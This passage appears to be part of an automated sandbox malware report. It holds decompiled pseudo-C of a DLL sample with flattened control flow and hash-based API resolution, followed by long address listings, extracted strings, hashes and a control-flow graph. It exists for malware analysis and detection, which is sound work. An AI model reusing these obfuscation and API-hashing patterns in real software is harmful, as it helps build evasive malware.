                                                                                                                                                                            							if(_t864 == 0xf34fc82) {
                                                                                                                                                                            								_push(_t774);
                                                                                                                                                                            								_push(_t774);
                                                                                                                                                                            								_t860 = E02F6CCA0(4, 0x10);
                                                                                                                                                                            								_push( &_v128);
                                                                                                                                                                            								_push(_t860);
                                                                                                                                                                            								_push(_v560);
                                                                                                                                                                            								_t833 = 0xb;
                                                                                                                                                                            								E02F5E404(_v456, _t833);
                                                                                                                                                                            								_t864 = 0x5f37ccd;
                                                                                                                                                                            								L13:
                                                                                                                                                                            								_t871 =  &(_t871[7]);
                                                                                                                                                                            								goto L14;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _t864 - 0xfefbdda;
                                                                                                                                                                            							if(_t864 == 0xfefbdda) {
                                                                                                                                                                            								E02F72B09(_v328, _v300, _v488, _v384);
                                                                                                                                                                            								return 0;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _t864 - 0xffd9b77;
                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                            								goto L31;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t864 = 0x17d426e;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t875 == 0) {
                                                                                                                                                                            							_t860 = _t860 +  *((intOrPtr*)(_t774 + 4));
                                                                                                                                                                            							_push(_t774);
                                                                                                                                                                            							_push(_t774);
                                                                                                                                                                            							_t718 = E02F5C5D8(_t860);
                                                                                                                                                                            							_t774 = _v480;
                                                                                                                                                                            							_t870 = _t718;
                                                                                                                                                                            							_t871 =  &(_t871[3]);
                                                                                                                                                                            							__eflags = _t870;
                                                                                                                                                                            							_t707 = 0x9c71ab3;
                                                                                                                                                                            							_t864 =  !=  ? 0x9c71ab3 : 0xfefbdda;
                                                                                                                                                                            							goto L2;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t864 == 0x17d426e) {
                                                                                                                                                                            							_push(_t774);
                                                                                                                                                                            							_push(_t774);
                                                                                                                                                                            							_t860 = E02F6CCA0(1, 8);
                                                                                                                                                                            							_push( &_v288);
                                                                                                                                                                            							_push(_t860);
                                                                                                                                                                            							_push(_v492);
                                                                                                                                                                            							_t832 = 9;
                                                                                                                                                                            							E02F5E404(_v436, _t832);
                                                                                                                                                                            							_t864 = 0xf34fc82;
                                                                                                                                                                            							goto L13;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t864 == 0x1bf95f7) {
                                                                                                                                                                            							E02F6C9B0(_v412, _t769, _v356,  *((intOrPtr*)(_t774 + 4)),  *_t774, _v548);
                                                                                                                                                                            							_t774 = _v480;
                                                                                                                                                                            							_t871 =  &(_t871[4]);
                                                                                                                                                                            							_t864 = 0x7c1f8ac;
                                                                                                                                                                            							_t769 = _t769 +  *((intOrPtr*)(_t774 + 4));
                                                                                                                                                                            							goto L1;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t864 == 0x5f37ccd) {
                                                                                                                                                                            							_t867 =  &_v256;
                                                                                                                                                                            							_push(_t774);
                                                                                                                                                                            							_push(_t774);
                                                                                                                                                                            							_t836 = E02F6CCA0(8, 0x10);
                                                                                                                                                                            							_t871 =  &(_t871[4]);
                                                                                                                                                                            							_t732 = _v420;
                                                                                                                                                                            							__eflags = _t732 - _t836;
                                                                                                                                                                            							if(_t732 < _t836) {
                                                                                                                                                                            								_t844 = _t836 - _t732;
                                                                                                                                                                            								_t861 = _t867;
                                                                                                                                                                            								_t786 = _t844 >> 1;
                                                                                                                                                                            								__eflags = _t786;
                                                                                                                                                                            								_t740 = memset(_t861, 0x2d002d, _t786 << 2);
                                                                                                                                                                            								asm("adc ecx, ecx");
                                                                                                                                                                            								_t867 = _t867 + _t844 * 2;
                                                                                                                                                                            								memset(_t861 + _t786, _t740, 0);
                                                                                                                                                                            								_t871 =  &(_t871[6]);
                                                                                                                                                                            								_t774 = 0;
                                                                                                                                                                            							}
                                                                                                                                                                            							_push(_t774);
                                                                                                                                                                            							_push(_t774);
                                                                                                                                                                            							_t737 = E02F6CCA0(8, 0x10);
                                                                                                                                                                            							_push(_t867);
                                                                                                                                                                            							_t860 = _t737;
                                                                                                                                                                            							_push(_t860);
                                                                                                                                                                            							_push(_v388);
                                                                                                                                                                            							_t837 = 0xb;
                                                                                                                                                                            							E02F5E404(_v444, _t837);
                                                                                                                                                                            							_t864 = 0xe33788a;
                                                                                                                                                                            							goto L13;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t864 == 0x77316ed) {
                                                                                                                                                                            							_push(_v472);
                                                                                                                                                                            							_push(_v468);
                                                                                                                                                                            							_push(_v572);
                                                                                                                                                                            							_t742 = E02F6E1F8(0x2f517a8, _v372, __eflags);
                                                                                                                                                                            							_t871 =  &(_t871[3]);
                                                                                                                                                                            							_push( &_v256);
                                                                                                                                                                            							_push(_t742);
                                                                                                                                                                            							_push(_t860);
                                                                                                                                                                            							_push(_v300);
                                                                                                                                                                            							 *((intOrPtr*)(E02F731AA(0xb00b1257, 0x44)))();
                                                                                                                                                                            							E02F6FECB(_t742, _v324, _v564, _v524, _v380);
                                                                                                                                                                            							_t864 = 0x86fed85;
                                                                                                                                                                            							goto L13;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t880 = _t864 - 0x7c1f8ac;
                                                                                                                                                                            						if(_t864 != 0x7c1f8ac) {
                                                                                                                                                                            							goto L31;
                                                                                                                                                                            						}
                                                                                                                                                                            						_push(_v520);
                                                                                                                                                                            						_push(_v360);
                                                                                                                                                                            						_push(0x2f51778);
                                                                                                                                                                            						_t750 = E02F53325( &_v256, E02F64244(_v504, _v512, _t880), _v292 - _t769, _v352, _v408, _t769);
                                                                                                                                                                            						E02F6FECB(_t747, _v392, _v336, _v400, _v344);
                                                                                                                                                                            						_t752 = _v296;
                                                                                                                                                                            						 *_t752 = _t870;
                                                                                                                                                                            						 *((intOrPtr*)(_t752 + 4)) = _t769 + _t750 - _t870;
                                                                                                                                                                            						L10:
                                                                                                                                                                            						return _v300;
                                                                                                                                                                            						L31:
                                                                                                                                                                            						__eflags = _t864 - 0xc7faa3a;
                                                                                                                                                                            					} while (__eflags != 0);
                                                                                                                                                                            					goto L10;
                                                                                                                                                                            				}
                                                                                                                                                                            			}
























































































































                                                                                                                                                                            0x02f62e5d
                                                                                                                                                                            0x02f62e5d
                                                                                                                                                                            0x02f62e67
                                                                                                                                                                            0x02f62e6e
                                                                                                                                                                            0x02f62e72
                                                                                                                                                                            0x02f62e7d
                                                                                                                                                                            0x02f62e8d
                                                                                                                                                                            0x02f62e94
                                                                                                                                                                            0x02f62e99
                                                                                                                                                                            0x02f62ea4
                                                                                                                                                                            0x02f62eb4
                                                                                                                                                                            0x02f62eb9
                                                                                                                                                                            0x02f62ebf
                                                                                                                                                                            0x02f62ec7
                                                                                                                                                                            0x02f62ecc
                                                                                                                                                                            0x02f62ed4
                                                                                                                                                                            0x02f62edc
                                                                                                                                                                            0x02f62ee4
                                                                                                                                                                            0x02f62eec
                                                                                                                                                                            0x02f62ef4
                                                                                                                                                                            0x02f62efc
                                                                                                                                                                            0x02f62f04
                                                                                                                                                                            0x02f62f11
                                                                                                                                                                            0x02f62f14
                                                                                                                                                                            0x02f62f18
                                                                                                                                                                            0x02f62f20
                                                                                                                                                                            0x02f62f28
                                                                                                                                                                            0x02f62f30
                                                                                                                                                                            0x02f62f40
                                                                                                                                                                            0x02f62f44
                                                                                                                                                                            0x02f62f4c
                                                                                                                                                                            0x02f62f54
                                                                                                                                                                            0x02f62f5f
                                                                                                                                                                            0x02f62f72
                                                                                                                                                                            0x02f62f73
                                                                                                                                                                            0x02f62f7a
                                                                                                                                                                            0x02f62f85
                                                                                                                                                                            0x02f62f8d
                                                                                                                                                                            0x02f62f92
                                                                                                                                                                            0x02f62f97
                                                                                                                                                                            0x02f62f9f
                                                                                                                                                                            0x02f62fa7
                                                                                                                                                                            0x02f62fb2
                                                                                                                                                                            0x02f62fba
                                                                                                                                                                            0x02f62fc5
                                                                                                                                                                            0x02f62fd9
                                                                                                                                                                            0x02f62fe0
                                                                                                                                                                            0x02f62feb
                                                                                                                                                                            0x02f62ff6
                                                                                                                                                                            0x02f62ffe
                                                                                                                                                                            0x02f63003
                                                                                                                                                                            0x02f6300b
                                                                                                                                                                            0x02f63013
                                                                                                                                                                            0x02f6301b
                                                                                                                                                                            0x02f63028
                                                                                                                                                                            0x02f6302c
                                                                                                                                                                            0x02f63034
                                                                                                                                                                            0x02f6303c
                                                                                                                                                                            0x02f63047
                                                                                                                                                                            0x02f63052
                                                                                                                                                                            0x02f6305d
                                                                                                                                                                            0x02f63068
                                                                                                                                                                            0x02f63070
                                                                                                                                                                            0x02f63080
                                                                                                                                                                            0x02f63085
                                                                                                                                                                            0x02f6308b
                                                                                                                                                                            0x02f63090
                                                                                                                                                                            0x02f63098
                                                                                                                                                                            0x02f630a0
                                                                                                                                                                            0x02f630ad
                                                                                                                                                                            0x02f630ae
                                                                                                                                                                            0x02f630b2
                                                                                                                                                                            0x02f630ba
                                                                                                                                                                            0x02f630c2
                                                                                                                                                                            0x02f630cd
                                                                                                                                                                            0x02f630d5
                                                                                                                                                                            0x02f630e0
                                                                                                                                                                            0x02f630eb
                                                                                                                                                                            0x02f630f6
                                                                                                                                                                            0x02f63101
                                                                                                                                                                            0x02f6310c
                                                                                                                                                                            0x02f63117
                                                                                                                                                                            0x02f63122
                                                                                                                                                                            0x02f6312a
                                                                                                                                                                            0x02f63135
                                                                                                                                                                            0x02f63140
                                                                                                                                                                            0x02f63153
                                                                                                                                                                            0x02f6315a
                                                                                                                                                                            0x02f63165
                                                                                                                                                                            0x02f63172
                                                                                                                                                                            0x02f63176
                                                                                                                                                                            0x02f6317e
                                                                                                                                                                            0x02f63186
                                                                                                                                                                            0x02f6318e
                                                                                                                                                                            0x02f6319b
                                                                                                                                                                            0x02f6319f
                                                                                                                                                                            0x02f631a7
                                                                                                                                                                            0x02f631af
                                                                                                                                                                            0x02f631b7
                                                                                                                                                                            0x02f631c2
                                                                                                                                                                            0x02f631cd
                                                                                                                                                                            0x02f631d8
                                                                                                                                                                            0x02f631eb
                                                                                                                                                                            0x02f631f2
                                                                                                                                                                            0x02f631fa
                                                                                                                                                                            0x02f63205
                                                                                                                                                                            0x02f63210
                                                                                                                                                                            0x02f6321b
                                                                                                                                                                            0x02f63226
                                                                                                                                                                            0x02f63231
                                                                                                                                                                            0x02f6323c
                                                                                                                                                                            0x02f63247
                                                                                                                                                                            0x02f63252
                                                                                                                                                                            0x02f6325d
                                                                                                                                                                            0x02f63265
                                                                                                                                                                            0x02f6326f
                                                                                                                                                                            0x02f63273
                                                                                                                                                                            0x02f6327b
                                                                                                                                                                            0x02f63283
                                                                                                                                                                            0x02f63297
                                                                                                                                                                            0x02f6329e
                                                                                                                                                                            0x02f632a9
                                                                                                                                                                            0x02f632b4
                                                                                                                                                                            0x02f632bc
                                                                                                                                                                            0x02f632c4
                                                                                                                                                                            0x02f632c9
                                                                                                                                                                            0x02f632ce
                                                                                                                                                                            0x02f632d6
                                                                                                                                                                            0x02f632e1
                                                                                                                                                                            0x02f632e9
                                                                                                                                                                            0x02f632f4
                                                                                                                                                                            0x02f632fe
                                                                                                                                                                            0x02f63303
                                                                                                                                                                            0x02f63311
                                                                                                                                                                            0x02f63316
                                                                                                                                                                            0x02f6331c
                                                                                                                                                                            0x02f63324
                                                                                                                                                                            0x02f6332f
                                                                                                                                                                            0x02f6333f
                                                                                                                                                                            0x02f63342
                                                                                                                                                                            0x02f63349
                                                                                                                                                                            0x02f63354
                                                                                                                                                                            0x02f6335c
                                                                                                                                                                            0x02f63369
                                                                                                                                                                            0x02f6336d
                                                                                                                                                                            0x02f63375
                                                                                                                                                                            0x02f63380
                                                                                                                                                                            0x02f6338b
                                                                                                                                                                            0x02f63396
                                                                                                                                                                            0x02f6339e
                                                                                                                                                                            0x02f633a3
                                                                                                                                                                            0x02f633ab
                                                                                                                                                                            0x02f633b3
                                                                                                                                                                            0x02f633bb
                                                                                                                                                                            0x02f633c3
                                                                                                                                                                            0x02f633cb
                                                                                                                                                                            0x02f633d3
                                                                                                                                                                            0x02f633db
                                                                                                                                                                            0x02f633e3
                                                                                                                                                                            0x02f633f6
                                                                                                                                                                            0x02f633f9
                                                                                                                                                                            0x02f63400
                                                                                                                                                                            0x02f6340b
                                                                                                                                                                            0x02f63416
                                                                                                                                                                            0x02f63421
                                                                                                                                                                            0x02f6342c
                                                                                                                                                                            0x02f63437
                                                                                                                                                                            0x02f63442
                                                                                                                                                                            0x02f6344d
                                                                                                                                                                            0x02f63458
                                                                                                                                                                            0x02f6346e
                                                                                                                                                                            0x02f63475
                                                                                                                                                                            0x02f6347d
                                                                                                                                                                            0x02f63488
                                                                                                                                                                            0x02f63490
                                                                                                                                                                            0x02f6349c
                                                                                                                                                                            0x02f6349f
                                                                                                                                                                            0x02f634a3
                                                                                                                                                                            0x02f634a8
                                                                                                                                                                            0x02f634b0
                                                                                                                                                                            0x02f634bb
                                                                                                                                                                            0x02f634c6
                                                                                                                                                                            0x02f634d1
                                                                                                                                                                            0x02f634dc
                                                                                                                                                                            0x02f634e4
                                                                                                                                                                            0x02f634ef
                                                                                                                                                                            0x02f634fa
                                                                                                                                                                            0x02f63505
                                                                                                                                                                            0x02f63510
                                                                                                                                                                            0x02f6351b
                                                                                                                                                                            0x02f63526
                                                                                                                                                                            0x02f63539
                                                                                                                                                                            0x02f63540
                                                                                                                                                                            0x02f6354d
                                                                                                                                                                            0x02f63555
                                                                                                                                                                            0x02f6355d
                                                                                                                                                                            0x02f63565
                                                                                                                                                                            0x02f6356a
                                                                                                                                                                            0x02f63572
                                                                                                                                                                            0x02f6357d
                                                                                                                                                                            0x02f63588
                                                                                                                                                                            0x02f63593
                                                                                                                                                                            0x02f6359e
                                                                                                                                                                            0x02f635a6
                                                                                                                                                                            0x02f635b1
                                                                                                                                                                            0x02f635c5
                                                                                                                                                                            0x02f635ca
                                                                                                                                                                            0x02f635d3
                                                                                                                                                                            0x02f635de
                                                                                                                                                                            0x02f635ea
                                                                                                                                                                            0x02f635ef
                                                                                                                                                                            0x02f635f5
                                                                                                                                                                            0x02f635fd
                                                                                                                                                                            0x02f63602
                                                                                                                                                                            0x02f6360a
                                                                                                                                                                            0x02f63615
                                                                                                                                                                            0x02f63620
                                                                                                                                                                            0x02f6362b
                                                                                                                                                                            0x02f6363e
                                                                                                                                                                            0x02f63641
                                                                                                                                                                            0x02f63653
                                                                                                                                                                            0x02f6365a
                                                                                                                                                                            0x02f63665
                                                                                                                                                                            0x02f63670
                                                                                                                                                                            0x02f63678
                                                                                                                                                                            0x02f63683
                                                                                                                                                                            0x02f6368e
                                                                                                                                                                            0x02f63696
                                                                                                                                                                            0x02f6369e
                                                                                                                                                                            0x02f636a9
                                                                                                                                                                            0x02f636b4
                                                                                                                                                                            0x02f636bf
                                                                                                                                                                            0x02f636ca
                                                                                                                                                                            0x02f636d7
                                                                                                                                                                            0x02f636da
                                                                                                                                                                            0x02f636de
                                                                                                                                                                            0x02f636e3
                                                                                                                                                                            0x02f636eb
                                                                                                                                                                            0x02f636f3
                                                                                                                                                                            0x02f63703
                                                                                                                                                                            0x02f63707
                                                                                                                                                                            0x02f6370f
                                                                                                                                                                            0x02f63717
                                                                                                                                                                            0x02f6371f
                                                                                                                                                                            0x02f63727
                                                                                                                                                                            0x02f6372f
                                                                                                                                                                            0x02f63737
                                                                                                                                                                            0x02f6373c
                                                                                                                                                                            0x02f63744
                                                                                                                                                                            0x02f63756
                                                                                                                                                                            0x02f63759
                                                                                                                                                                            0x02f63760
                                                                                                                                                                            0x02f6376d
                                                                                                                                                                            0x02f63775
                                                                                                                                                                            0x02f63784
                                                                                                                                                                            0x02f63787
                                                                                                                                                                            0x02f6378e
                                                                                                                                                                            0x02f63792
                                                                                                                                                                            0x02f6379a
                                                                                                                                                                            0x02f637a2
                                                                                                                                                                            0x02f637b2
                                                                                                                                                                            0x02f637ba
                                                                                                                                                                            0x02f637bf
                                                                                                                                                                            0x02f637c6
                                                                                                                                                                            0x02f637ca
                                                                                                                                                                            0x02f637d2
                                                                                                                                                                            0x02f637da
                                                                                                                                                                            0x02f637ee
                                                                                                                                                                            0x02f637f5
                                                                                                                                                                            0x02f637fc
                                                                                                                                                                            0x02f63807
                                                                                                                                                                            0x02f6381a
                                                                                                                                                                            0x02f63821
                                                                                                                                                                            0x02f63829
                                                                                                                                                                            0x02f63834
                                                                                                                                                                            0x02f6383f
                                                                                                                                                                            0x02f63852
                                                                                                                                                                            0x02f63859
                                                                                                                                                                            0x02f63864
                                                                                                                                                                            0x02f6386f
                                                                                                                                                                            0x02f6387a
                                                                                                                                                                            0x02f63885
                                                                                                                                                                            0x02f63890
                                                                                                                                                                            0x02f63898
                                                                                                                                                                            0x02f638a3
                                                                                                                                                                            0x02f638ae
                                                                                                                                                                            0x02f638b9
                                                                                                                                                                            0x02f638c1
                                                                                                                                                                            0x02f638cc
                                                                                                                                                                            0x02f638d7
                                                                                                                                                                            0x02f638e2
                                                                                                                                                                            0x02f638ed
                                                                                                                                                                            0x02f638f5
                                                                                                                                                                            0x02f638fd
                                                                                                                                                                            0x02f6390a
                                                                                                                                                                            0x02f6390e
                                                                                                                                                                            0x02f63916
                                                                                                                                                                            0x02f63921
                                                                                                                                                                            0x02f6392c
                                                                                                                                                                            0x02f63934
                                                                                                                                                                            0x02f6393f
                                                                                                                                                                            0x02f6393f
                                                                                                                                                                            0x02f6393f
                                                                                                                                                                            0x02f63944
                                                                                                                                                                            0x02f63944
                                                                                                                                                                            0x02f63944
                                                                                                                                                                            0x02f63944
                                                                                                                                                                            0x02f6394a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f63be6
                                                                                                                                                                            0x02f63be8
                                                                                                                                                                            0x02f63ca8
                                                                                                                                                                            0x02f63caf
                                                                                                                                                                            0x02f63cb2
                                                                                                                                                                            0x02f63cc7
                                                                                                                                                                            0x02f63ccc
                                                                                                                                                                            0x02f63cd3
                                                                                                                                                                            0x02f63cda
                                                                                                                                                                            0x02f63d26
                                                                                                                                                                            0x02f63d34
                                                                                                                                                                            0x02f63d39
                                                                                                                                                                            0x02f63d40
                                                                                                                                                                            0x02f63d43
                                                                                                                                                                            0x02f63d48
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f63d48
                                                                                                                                                                            0x02f63bee
                                                                                                                                                                            0x02f63bf4
                                                                                                                                                                            0x02f63c6d
                                                                                                                                                                            0x02f63c84
                                                                                                                                                                            0x02f63c85
                                                                                                                                                                            0x02f63c87
                                                                                                                                                                            0x02f63c8c
                                                                                                                                                                            0x02f63c8f
                                                                                                                                                                            0x02f63c96
                                                                                                                                                                            0x02f63c98
                                                                                                                                                                            0x02f63a22
                                                                                                                                                                            0x02f63a22
                                                                                                                                                                            0x02f63c9e
                                                                                                                                                                            0x02f63a8d
                                                                                                                                                                            0x02f63a8d
                                                                                                                                                                            0x02f6393f
                                                                                                                                                                            0x02f6393f
                                                                                                                                                                            0x02f6393f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6393f
                                                                                                                                                                            0x02f6393f
                                                                                                                                                                            0x02f63bf6
                                                                                                                                                                            0x02f63bfc
                                                                                                                                                                            0x02f63c36
                                                                                                                                                                            0x02f63c37
                                                                                                                                                                            0x02f63c41
                                                                                                                                                                            0x02f63c4a
                                                                                                                                                                            0x02f63c4b
                                                                                                                                                                            0x02f63c4c
                                                                                                                                                                            0x02f63c59
                                                                                                                                                                            0x02f63c5a
                                                                                                                                                                            0x02f63c5f
                                                                                                                                                                            0x02f63a8a
                                                                                                                                                                            0x02f63a8a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f63a8a
                                                                                                                                                                            0x02f63bfe
                                                                                                                                                                            0x02f63c04
                                                                                                                                                                            0x02f63d77
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f63d7e
                                                                                                                                                                            0x02f63c0a
                                                                                                                                                                            0x02f63c10
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f63c16
                                                                                                                                                                            0x02f63c16
                                                                                                                                                                            0x02f63950
                                                                                                                                                                            0x02f63bb0
                                                                                                                                                                            0x02f63bc1
                                                                                                                                                                            0x02f63bc2
                                                                                                                                                                            0x02f63bc4
                                                                                                                                                                            0x02f63bc9
                                                                                                                                                                            0x02f63bcd
                                                                                                                                                                            0x02f63bcf
                                                                                                                                                                            0x02f63bd7
                                                                                                                                                                            0x02f63bd9
                                                                                                                                                                            0x02f63bde
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f63bde
                                                                                                                                                                            0x02f6395c
                                                                                                                                                                            0x02f63b72
                                                                                                                                                                            0x02f63b73
                                                                                                                                                                            0x02f63b7d
                                                                                                                                                                            0x02f63b86
                                                                                                                                                                            0x02f63b87
                                                                                                                                                                            0x02f63b88
                                                                                                                                                                            0x02f63b95
                                                                                                                                                                            0x02f63b96
                                                                                                                                                                            0x02f63b9b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f63b9b
                                                                                                                                                                            0x02f63968
                                                                                                                                                                            0x02f63b46
                                                                                                                                                                            0x02f63b4b
                                                                                                                                                                            0x02f63b52
                                                                                                                                                                            0x02f63b55
                                                                                                                                                                            0x02f63b5a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f63b5a
                                                                                                                                                                            0x02f63974
                                                                                                                                                                            0x02f63a9d
                                                                                                                                                                            0x02f63ab6
                                                                                                                                                                            0x02f63ab7
                                                                                                                                                                            0x02f63ac1
                                                                                                                                                                            0x02f63ac3
                                                                                                                                                                            0x02f63ac6
                                                                                                                                                                            0x02f63acd
                                                                                                                                                                            0x02f63acf
                                                                                                                                                                            0x02f63ad1
                                                                                                                                                                            0x02f63ad3
                                                                                                                                                                            0x02f63adc
                                                                                                                                                                            0x02f63adc
                                                                                                                                                                            0x02f63ade
                                                                                                                                                                            0x02f63ae0
                                                                                                                                                                            0x02f63ae2
                                                                                                                                                                            0x02f63ae5
                                                                                                                                                                            0x02f63ae5
                                                                                                                                                                            0x02f63ae5
                                                                                                                                                                            0x02f63ae5
                                                                                                                                                                            0x02f63afe
                                                                                                                                                                            0x02f63aff
                                                                                                                                                                            0x02f63b04
                                                                                                                                                                            0x02f63b09
                                                                                                                                                                            0x02f63b0a
                                                                                                                                                                            0x02f63b0c
                                                                                                                                                                            0x02f63b0d
                                                                                                                                                                            0x02f63b1d
                                                                                                                                                                            0x02f63b1e
                                                                                                                                                                            0x02f63b23
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f63b23
                                                                                                                                                                            0x02f63980
                                                                                                                                                                            0x02f63a23
                                                                                                                                                                            0x02f63a2c
                                                                                                                                                                            0x02f63a33
                                                                                                                                                                            0x02f63a3e
                                                                                                                                                                            0x02f63a43
                                                                                                                                                                            0x02f63a54
                                                                                                                                                                            0x02f63a55
                                                                                                                                                                            0x02f63a56
                                                                                                                                                                            0x02f63a57
                                                                                                                                                                            0x02f63a66
                                                                                                                                                                            0x02f63a80
                                                                                                                                                                            0x02f63a85
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f63a85
                                                                                                                                                                            0x02f63986
                                                                                                                                                                            0x02f6398c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f63992
                                                                                                                                                                            0x02f63996
                                                                                                                                                                            0x02f639a5
                                                                                                                                                                            0x02f639d6
                                                                                                                                                                            0x02f639fb
                                                                                                                                                                            0x02f63a00
                                                                                                                                                                            0x02f63a0c
                                                                                                                                                                            0x02f63a0e
                                                                                                                                                                            0x02f63a11
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f63d4d
                                                                                                                                                                            0x02f63d4d
                                                                                                                                                                            0x02f63d4d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f63d59

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: !s9$*a<$-3n3$1TPy$5S$8j$9I $DJ3$IF$Sg$kn_$|I9$$7$3$DO$Gd$I,
                                                                                                                                                                            • API String ID: 0-3070105227
                                                                                                                                                                            • Opcode ID: b9f1a77f23cf882dd558c9f2a0e8cff66347d7ed81c092852444e17dc82422eb
                                                                                                                                                                            • Instruction ID: a1b123f0c728bbec5eb5791f2226533a081dea8a388e55c88467a8f576236df0
                                                                                                                                                                            • Opcode Fuzzy Hash: b9f1a77f23cf882dd558c9f2a0e8cff66347d7ed81c092852444e17dc82422eb
                                                                                                                                                                            • Instruction Fuzzy Hash: ED7200715083819BD3B8CF25C58AB9BBBE1FBC4754F10891DE6DA8A260D7B09949CF43
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 483 2f53431-2f5425f 484 2f54267-2f54271 483->484 485 2f54276-2f54278 484->485 486 2f5427e 485->486 487 2f54628-2f5462e 485->487 490 2f54284-2f5428a 486->490 491 2f544d1-2f54620 call 2f6e1f8 * 2 call 2f600c5 call 2f549a4 call 2f6fecb * 2 486->491 488 2f54634-2f54636 487->488 489 2f546fc-2f5471b call 2f72b09 487->489 496 2f5464e-2f546f4 call 2f6e1f8 call 2f5f288 call 2f6fecb 488->496 497 2f54638-2f5463e 488->497 512 2f5471d-2f54727 489->512 492 2f54290-2f54292 490->492 493 2f543f9-2f544cc call 2f6e1f8 * 2 call 2f5738a call 2f6fecb * 2 490->493 491->487 500 2f54294-2f54296 492->500 501 2f54311-2f543c1 call 2f6e1f8 call 2f550e8 492->501 545 2f543ef-2f543f4 493->545 496->489 498 2f54644-2f54649 497->498 499 2f5472c-2f54732 497->499 498->485 499->485 513 2f54738 499->513 506 2f542cd-2f5430c call 2f5c5d8 500->506 507 2f54298-2f5429a 500->507 534 2f543c3-2f543c8 501->534 535 2f543ca 501->535 506->484 507->499 514 2f542a0-2f542cc call 2f5f7fe 507->514 512->499 513->513 536 2f543cf-2f543ec call 2f6fecb 534->536 535->536 536->545 545->512
                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                            			E02F53431(intOrPtr __ecx) {
                                                                                                                                                                            				char _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				char* _v48;
                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				char _v68;
                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                            				char _v76;
                                                                                                                                                                            				char _v80;
                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                            				signed int _v96;
                                                                                                                                                                            				signed int _v100;
                                                                                                                                                                            				signed int _v104;
                                                                                                                                                                            				signed int _v108;
                                                                                                                                                                            				signed int _v112;
                                                                                                                                                                            				signed int _v116;
                                                                                                                                                                            				signed int _v120;
                                                                                                                                                                            				signed int _v124;
                                                                                                                                                                            				signed int _v128;
                                                                                                                                                                            				signed int _v132;
                                                                                                                                                                            				signed int _v136;
                                                                                                                                                                            				signed int _v140;
                                                                                                                                                                            				signed int _v144;
                                                                                                                                                                            				signed int _v148;
                                                                                                                                                                            				signed int _v152;
                                                                                                                                                                            				signed int _v156;
                                                                                                                                                                            				signed int _v160;
                                                                                                                                                                            				signed int _v164;
                                                                                                                                                                            				signed int _v168;
                                                                                                                                                                            				signed int _v172;
                                                                                                                                                                            				signed int _v176;
                                                                                                                                                                            				signed int _v180;
                                                                                                                                                                            				signed int _v184;
                                                                                                                                                                            				signed int _v188;
                                                                                                                                                                            				signed int _v192;
                                                                                                                                                                            				signed int _v196;
                                                                                                                                                                            				signed int _v200;
                                                                                                                                                                            				signed int _v204;
                                                                                                                                                                            				signed int _v208;
                                                                                                                                                                            				signed int _v212;
                                                                                                                                                                            				signed int _v216;
                                                                                                                                                                            				signed int _v220;
                                                                                                                                                                            				signed int _v224;
                                                                                                                                                                            				signed int _v228;
                                                                                                                                                                            				signed int _v232;
                                                                                                                                                                            				signed int _v236;
                                                                                                                                                                            				signed int _v240;
                                                                                                                                                                            				signed int _v244;
                                                                                                                                                                            				signed int _v248;
                                                                                                                                                                            				signed int _v252;
                                                                                                                                                                            				signed int _v256;
                                                                                                                                                                            				signed int _v260;
                                                                                                                                                                            				signed int _v264;
                                                                                                                                                                            				signed int _v268;
                                                                                                                                                                            				signed int _v272;
                                                                                                                                                                            				signed int _v276;
                                                                                                                                                                            				signed int _v280;
                                                                                                                                                                            				unsigned int _v284;
                                                                                                                                                                            				signed int _v288;
                                                                                                                                                                            				signed int _v292;
                                                                                                                                                                            				signed int _v296;
                                                                                                                                                                            				signed int _v300;
                                                                                                                                                                            				signed int _v304;
                                                                                                                                                                            				signed int _v308;
                                                                                                                                                                            				signed int _v312;
                                                                                                                                                                            				signed int _v316;
